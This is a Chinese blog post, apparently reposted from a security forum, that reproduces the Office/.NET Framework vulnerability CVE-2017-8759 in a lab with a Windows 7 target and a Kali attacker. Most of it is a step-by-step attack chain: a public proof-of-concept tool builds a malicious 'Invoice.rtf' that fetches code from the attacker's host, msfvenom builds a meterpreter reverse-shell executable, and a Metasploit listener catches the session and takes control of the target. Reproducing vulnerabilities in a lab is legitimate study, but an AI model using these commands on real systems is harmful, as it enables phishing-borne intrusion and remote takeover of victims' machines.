CVE-2017-8759 复现

来源:互联网 发布:python 不显示warning 编辑:程序博客网 时间:2024/05/18 01:18

漏洞成因:近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞(CVE-2017-0199)如出一辙,不同的是,这次黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,而整个漏洞的罪魁祸首竞是.NET    Framework一个换行符处理失误。(出自: 一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警)



利用文件:这里我直接利用的github上一个大牛的POC,里面详细介绍了用法。

https://github.com/bhdresh/CVE-2017-8759.git





环境搭建:靶机:windows 7     ip:172.16.9.53   

                  攻击机:kali linux    ip:172.16.9.110



利用过程
1.首先获取github上的POC。   



2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件invoice.rtf。
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://172.16.9.110/logo.txt   

3.利用msfVENOM生成一个反弹shell的exe文件,并命名为shell.exe。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.9.110 LPORT=4444 -f exe > /root/shell.exe

4.我们需要监听来自ppsx文件执行之后反弹的shell。
pythoncve-2017-8759_toolkit.py -M exp -e http://172.16.9.110/shell.exe -l/root/shell.exe
5.开启metasploit的监听模块exploit/multi/handler进行监听。
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 172.16.9.110; run"


6.把恶意rtf文件发送到win7靶机上,当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,进入meterpreter,即可获取靶机控制权。



至此复现成功,感谢大家的阅读!!!

原文地址:https://bbs.ichunqiu.com/thread-27342-1-1.html